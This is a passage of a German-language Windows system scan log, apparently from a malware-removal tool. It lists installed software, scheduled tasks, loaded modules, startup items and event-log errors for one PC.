CCC Help Swedish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden CCC Help Thai (x32 Version: 2010.0421.0656.10561 - ATI) Hidden CCC Help Turkish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden ccc-core-static (x32 Version: 2010.0421.657.10561 - Ihr Firmenname) Hidden ccc-utility64 (Version: 2010.0421.657.10561 - ATI) Hidden D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden Definition Update for Microsoft Office 2010 (KB982726) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{DC4BC0CC-A928-4C48-BA40-AC24784F46E5}) (Version: - Microsoft) Dropbox (HKCU\...\Dropbox) (Version: 2.4.11 - Dropbox, Inc.) Fotogalerie (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Google Chrome (HKLM-x32\...\Google Chrome) (Version: 33.0.1750.154 - Google Inc.) Google Update Helper (x32 Version: 1.3.23.9 - Google Inc.) Hidden HP Officejet 4620 series - Grundlegende Software für das Gerät (HKLM\...\{B16F9E6E-1388-472C-98C3-F32D397EF85D}) (Version: 28.0.1315.0 - Hewlett-Packard Co.) HP Update (HKLM-x32\...\{6F1C00D2-25C2-4CBA-8126-AE9A6E2E9CD5}) (Version: 5.003.003.001 - Hewlett-Packard) I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP) Identity Card (HKLM-x32\...\Identity Card) (Version: 1.00.3003 - Acer Incorporated) iFunbox (v2.7.2386.747), iFunbox DevTeam (HKLM-x32\...\iFunbox_is1) (Version: v2.7.2386.747 - ) Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation) Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.0.1014 - Intel Corporation) iTunes (HKLM\...\{B8BA155B-1E75-405F-9CB4-8A99615D09DC}) (Version: 11.1.5.5 - Apple Inc.) JDownloader 0.9 (HKLM-x32\...\5513-1208-7298-9440) (Version: 0.9 - AppWork GmbH) Launch Manager (HKLM-x32\...\LManager) (Version: 4.0.10 - Acer Inc.) 
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden Microsoft .NET Framework 4 Client Profile DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Client Profile DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Client Profile DEU Language Pack (Version: 4.0.30319 - Microsoft Corporation) Hidden Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Extended (Version: 4.0.30319 - Microsoft Corporation) Hidden Microsoft .NET Framework 4 Extended DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Extended DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Extended DEU Language Pack (Version: 4.0.30319 - Microsoft Corporation) Hidden Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden Microsoft Office Access MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Excel MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Groove MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office InfoPath MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Office 32-bit Components 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office OneNote MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Outlook MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office PowerPoint MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Professional Plus 2010 (HKLM\...\Office14.PROPLUS) (Version: 14.0.7015.1000 
- Microsoft Corporation) Microsoft Office Professional Plus 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Proof (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Proof (French) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Proof (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Proof (Italian) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Proofing (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Publisher MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Shared 32-bit MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Shared MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Word MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Movie Maker (x32 Version: 16.4.3508.0205 
- Microsoft Corporation) Hidden MozBackup 1.5.1 (HKLM-x32\...\MozBackup) (Version: - Pavel Cvrcek) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 24.3.0 - Mozilla) Mozilla Thunderbird 24.3.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 24.3.0 (x86 de)) (Version: 24.3.0 - Mozilla) MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden MSVCRT110 (x32 Version: 16.4.1108.0727 - Microsoft) Hidden MSVCRT110_amd64 (Version: 16.4.1109.0912 - Microsoft) Hidden MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) NetLimiter 3 (HKLM\...\{913923AB-3AAB-4870-8910-627C4CD82789}) (Version: 3.0.0.11 - Locktime Software s.r.o.) Photo Common (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Photo Gallery (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden PX Profile Update (x32 Version: 1.00.1. - AMD) Hidden Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6029 - Realtek Semiconductor Corp.) Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version: - Microsoft) Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version: - Microsoft) Hidden Skype™ 6.14 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.14.104 - Skype Technologies S.A.) 
TeraCopy 2.27 (HKLM\...\TeraCopy_is1) (Version: - Code Sector) Update for Microsoft .NET Framework 4 Client Profile (KB2468871) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2468871) (Version: 1 - Microsoft Corporation) Update for Microsoft .NET Framework 4 Client Profile (KB2533523) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2533523) (Version: 1 - Microsoft Corporation) Update for Microsoft .NET Framework 4 Client Profile (KB2600217) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2600217) (Version: 1 - Microsoft Corporation) Update for Microsoft .NET Framework 4 Extended (KB2468871) (HKLM-x32\...\{8E34682C-8118-31F1-BC4C-98CD9675E1C2}.KB2468871) (Version: 1 - Microsoft Corporation) Update for Microsoft .NET Framework 4 Extended (KB2533523) (HKLM-x32\...\{8E34682C-8118-31F1-BC4C-98CD9675E1C2}.KB2533523) (Version: 1 - Microsoft Corporation) Update for Microsoft .NET Framework 4 Extended (KB2600217) (HKLM-x32\...\{8E34682C-8118-31F1-BC4C-98CD9675E1C2}.KB2600217) (Version: 1 - Microsoft Corporation) Update for Microsoft Access 2010 (KB2553446) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{FEF4C57D-0975-4D3C-ACC7-DCD038C3788F}) (Version: - Microsoft) Update for Microsoft Filter Pack 2.0 (KB2837594) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{99A0DB9A-71FC-4F98-BC1F-78A18195C677}) (Version: - Microsoft) Update for Microsoft InfoPath 2010 (KB2817369) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{DB0B0CDF-77EC-47B0-94E2-4738573A1E58}) (Version: - Microsoft) Update for Microsoft InfoPath 2010 (KB2817396) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{1AA82E2E-7DB7-4C70-910C-BBB657A6B3A5}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2589298) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{79C725A1-3964-421C-A528-78C1C083C7C7}) (Version: - Microsoft) 
Update for Microsoft Office 2010 (KB2589352) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{95BE5D45-A3DD-4CB1-8C35-D75DD7B4D862}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2589352) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{95BE5D45-A3DD-4CB1-8C35-D75DD7B4D862}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2589375) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{EBD18DE5-BC84-4B57-9A30-097044871F9A}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2597087) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{4AD36582-256B-433D-8593-F31773A15CA4}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2597087) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{4AD36582-256B-433D-8593-F31773A15CA4}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2760598) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{F216169C-2B40-429B-8370-B5BA06EC5423}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2760598) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{F216169C-2B40-429B-8370-B5BA06EC5423}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2760631) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{B6AD7E27-012A-4B63-82BA-AF62893E5435}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2794737) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{07DC9C6C-E916-4F42-8677-716930ED0393}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2825640) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{43F59F4D-7179-497E-BE99-BC6F7D1DDCBA}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2825640) 64-Bit Edition 
(HKLM\...\{90140000-0044-0407-1000-0000000FF1CE}_Office14.PROPLUS_{43F59F4D-7179-497E-BE99-BC6F7D1DDCBA}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2850079) 64-Bit Edition (HKLM\...\{90140000-001F-0407-1000-0000000FF1CE}_Office14.PROPLUS_{64D96F30-CF4C-4CCE-AAF2-F8909348BF35}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2850079) 64-Bit Edition (HKLM\...\{90140000-001F-040C-1000-0000000FF1CE}_Office14.PROPLUS_{9F6507AC-7D8F-46C1-B90F-59C7828E0E0D}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2863818) 64-Bit Edition (HKLM\...\{90140000-001F-0409-1000-0000000FF1CE}_Office14.PROPLUS_{A9C4BE58-07E0-473D-AE68-ECBA13FBF77E}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2878225) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{8A6BDA63-4D23-4485-A466-8979E10BCF49}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2878225) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{8A6BDA63-4D23-4485-A466-8979E10BCF49}) (Version: - Microsoft) Update for Microsoft OneNote 2010 (KB2837595) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{3029C408-1DD1-4273-8E58-87CB1B638FC8}) (Version: - Microsoft) Update for Microsoft OneNote 2010 (KB2837595) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{3029C408-1DD1-4273-8E58-87CB1B638FC8}) (Version: - Microsoft) Update for Microsoft Outlook 2010 (KB2687567) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{DDDC32A5-9528-4771-B91A-97A8E1D7957B}) (Version: - Microsoft) Update for Microsoft Outlook 2010 (KB2687567) 64-Bit Edition (HKLM\...\{90140000-001A-0407-1000-0000000FF1CE}_Office14.PROPLUS_{6164E0E5-C903-488C-93AF-1B7AF7EBC331}) (Version: - Microsoft) Update for Microsoft PowerPoint 2010 (KB2553145) 64-Bit Edition 
(HKLM\...\{90140000-0018-0407-1000-0000000FF1CE}_Office14.PROPLUS_{BEA3259E-14B5-4D89-87FF-ED9F1D0D81C8}) (Version: - Microsoft) Update for Microsoft PowerPoint 2010 (KB2775360) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{BE1D254A-E5CD-4E76-9BE8-7B2E5FDBA6AF}) (Version: - Microsoft) Update for Microsoft SharePoint Workspace 2010 (KB2760601) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{77374F16-2DC6-4EEF-AFAD-C59FDA2E010D}) (Version: - Microsoft) Update for Microsoft SharePoint Workspace 2010 (KB2760601) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{77374F16-2DC6-4EEF-AFAD-C59FDA2E010D}) (Version: - Microsoft) Update for Microsoft Visio Viewer 2010 (KB2810066) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{DF33B92A-5381-4F03-AB54-2D67086B357E}) (Version: - Microsoft) Update for Microsoft Word 2010 (KB2837593) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{A82E26EF-680E-427D-B7D0-FD7997DDC217}) (Version: - Microsoft) VLC media player 2.0.6 (HKLM\...\VLC media player) (Version: 2.0.6 - VideoLAN) VR-NetWorld (HKLM-x32\...\{8815F011-43AF-4F50-BBD8-D78ED3D6F5B9}) (Version: - ) Windows Live Communications Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation) Windows Live Essentials (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live ID Sign-in Assistant (Version: 7.250.4311.0 - Microsoft Corporation) Hidden Windows Live Installer (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live Photo Common (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live PIMT Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live SOXE (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live SOXE 
Definitions (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live UX Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live UX Platform Language Pack (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden WinRAR 4.20 (32-Bit) (HKLM-x32\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH) ==================== Restore Points ========================= 04-03-2014 03:23:52 Windows Update 04-03-2014 12:08:17 Windows Live Essentials 04-03-2014 12:11:06 Windows Update 04-03-2014 12:13:06 Windows Update 04-03-2014 12:13:55 DirectX wurde installiert 04-03-2014 12:14:27 DirectX wurde installiert 04-03-2014 12:15:14 DirectX wurde installiert 04-03-2014 12:16:48 WLSetup 14-03-2014 02:00:37 Windows Update 23-03-2014 22:56:32 Geplanter Prüfpunkt ==================== Hosts content: ========================== 2009-07-14 04:34 - 2014-02-25 18:48 - 00000853 ____N C:\Windows\system32\Drivers\etc\hosts ==================== Scheduled Tasks (whitelisted) ============= Task: {1F2FE24C-4B0D-45D4-8B60-A98B45D048CA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16] (Google Inc.) Task: {5ADA0D06-B2AE-41FA-B409-CCC39DFB0EF2} - System32\Tasks\{95AAC210-9BFE-40A9-AF62-1A23A8FF05C6} => Chrome.exe hxxp://ui.skype.com/ui/0/4.1.0.179.367/de/abandoninstall?source=lightinstaller&page=tsProblems&LastError=404&installinfo=google-toolbar:notoffered;notincluded,google-chrome:notoffered;notincluded Task: {A375B6A6-9D4A-471F-A303-95C4CA7AD0FA} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe Task: {BBBBFC89-6720-42F2-9EB0-F18DE5DD0B9E} - System32\Tasks\{1035BE4D-F19C-4FDC-9E19-49D3A845A3FF} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&ver=4.1.0.179.367&LastError=404 Task: {E072B638-8F77-4687-8C9B-4EA80C5B4038} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16] (Google Inc.) 
Task: C:\Windows\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe ==================== Loaded Modules (whitelisted) ============= 2011-03-21 16:19 - 2011-03-21 16:19 - 00053248 _____ () C:\Program Files\NetLimiter 3\nlsvcPS.dll 2013-09-05 01:17 - 2013-09-05 01:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF 2013-04-16 21:32 - 2011-10-26 17:41 - 00318976 _____ () C:\Program Files\TeraCopy\TeraCopyExt64.dll 2013-04-16 21:32 - 2011-10-26 17:41 - 00126464 _____ () C:\Program Files\TeraCopy\TeraCopy64.dll 2010-03-26 10:41 - 2010-03-26 10:41 - 00016384 ____R () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll 2013-04-16 20:01 - 2013-04-16 20:01 - 00270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll 2013-04-16 21:58 - 2013-04-16 21:58 - 00397704 _____ () C:\Program Files (x86)\Avira\AntiVir Desktop\sqlite3.dll 2014-02-12 21:58 - 2014-02-12 21:58 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll 2014-02-12 21:58 - 2014-02-12 21:58 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll 2010-03-09 02:18 - 2010-03-09 02:18 - 00465576 _____ () C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\sqlite3.dll 2010-03-09 02:13 - 2010-03-09 02:13 - 01081600 _____ () C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\ACE.dll 2013-04-17 04:50 - 2009-05-21 00:02 - 00072200 _____ () C:\Program Files (x86)\Launch Manager\CdDirIo.dll 2014-02-12 21:58 - 2014-02-12 21:58 - 00237384 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll 
2013-09-05 01:14 - 2013-09-05 01:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF 2014-04-02 08:03 - 2014-03-15 02:50 - 00051016 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\chrome_elf.dll 2014-04-02 08:03 - 2014-03-15 02:50 - 00716616 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\libglesv2.dll 2014-04-02 08:03 - 2014-03-15 02:50 - 00100168 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\libegl.dll 2014-04-02 08:03 - 2014-03-15 02:50 - 04061000 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\pdf.dll 2014-04-02 08:03 - 2014-03-15 02:50 - 00394568 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ppGoogleNaClPluginChrome.dll 2014-04-02 08:03 - 2014-03-15 02:50 - 01647432 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ffmpegsumo.dll ==================== Alternate Data Streams (whitelisted) ========= ==================== Safe Mode (whitelisted) =================== ==================== Disabled items from MSCONFIG ============== MSCONFIG\startupfolder: C:^Users^Franz^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk => C:\Windows\pss\Dropbox.lnk.Startup MSCONFIG\startupfolder: C:^Users^Franz^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Tintenwarnungen überwachen - HP Officejet 4620 series (Netzwerk).lnk => C:\Windows\pss\Tintenwarnungen überwachen - HP Officejet 4620 series (Netzwerk).lnk.Startup MSCONFIG\startupreg: Adobe Reader Speed Launcher => "c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe" MSCONFIG\startupreg: HP Officejet 4620 series (NET) => "C:\Program Files\HP\HP Officejet 4620 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN298240ZB05S1:NW" -scfn "HP Officejet 4620 series (NET)" -AutoStart 1 ==================== Faulty Device Manager Devices ============= ==================== Event log errors: 
========================= Application errors: ================== Error: (04/14/2014 10:31:23 AM) (Source: Application Hang) (User: ) Description: Programm VRNetWorld.exe, Version 5.1.0.12 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen. Prozess-ID: fe0 Startzeit: 01cf57ba07163d71 Endzeit: 0 Anwendungspfad: C:\Program Files (x86)\VR-NetWorld\VRNetWorld.exe Berichts-ID: 7c160182-c3ae-11e3-b796-00262dac37ec Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service) (User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 25252272 Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service) (User: ) Description: Task Scheduling Error: m->NextScheduledEvent 25252272 Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service) (User: ) Description: Task Scheduling Error: Continuously busy for more than a second Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service) (User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 25251258 Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service) (User: ) Description: Task Scheduling Error: m->NextScheduledEvent 25251258 Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service) (User: ) Description: Task Scheduling Error: Continuously busy for more than a second Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service) (User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 25250244 Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service) (User: ) Description: Task Scheduling Error: m->NextScheduledEvent 25250244 Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service) (User: ) Description: Task Scheduling Error: Continuously busy for more than a second System errors: ============= Error: (04/14/2014 10:43:16 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT) Description: Fehler beim Lesen der Datei für lokale Hosts. 
Error: (04/14/2014 10:43:16 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT) Description: Fehler beim Lesen der Datei für lokale Hosts. Error: (04/14/2014 10:38:47 AM) (Source: Disk) (User: ) Description: Der Treiber hat einen Controllerfehler auf \Device\Harddisk1\DR1 gefunden. Error: (04/14/2014 10:38:44 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT) Description: Fehler beim Lesen der Datei für lokale Hosts. Error: (04/14/2014 10:38:32 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT) Description: Fehler beim Lesen der Datei für lokale Hosts. Error: (04/14/2014 10:38:30 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT) Description: Fehler beim Lesen der Datei für lokale Hosts. Error: (04/14/2014 10:38:30 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT) Description: Fehler beim Lesen der Datei für lokale Hosts. Error: (04/14/2014 10:38:30 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT) Description: Fehler beim Lesen der Datei für lokale Hosts. Error: (04/14/2014 10:38:28 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT) Description: Fehler beim Lesen der Datei für lokale Hosts. Error: (04/14/2014 10:38:27 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT) Description: Fehler beim Lesen der Datei für lokale Hosts. 
Microsoft Office Sessions: ========================= Error: (04/14/2014 10:31:23 AM) (Source: Application Hang)(User: ) Description: VRNetWorld.exe5.1.0.12fe001cf57ba07163d710C:\Program Files (x86)\VR-NetWorld\VRNetWorld.exe7c160182-c3ae-11e3-b796-00262dac37ec Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service)(User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 25252272 Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service)(User: ) Description: Task Scheduling Error: m->NextScheduledEvent 25252272 Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service)(User: ) Description: Task Scheduling Error: Continuously busy for more than a second Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service)(User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 25251258 Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service)(User: ) Description: Task Scheduling Error: m->NextScheduledEvent 25251258 Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service)(User: ) Description: Task Scheduling Error: Continuously busy for more than a second Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service)(User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 25250244 Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service)(User: ) Description: Task Scheduling Error: m->NextScheduledEvent 25250244 Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service)(User: ) Description: Task Scheduling Error: Continuously busy for more than a second CodeIntegrity Errors: =================================== Date: 2014-03-05 15:59:48.934 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. 
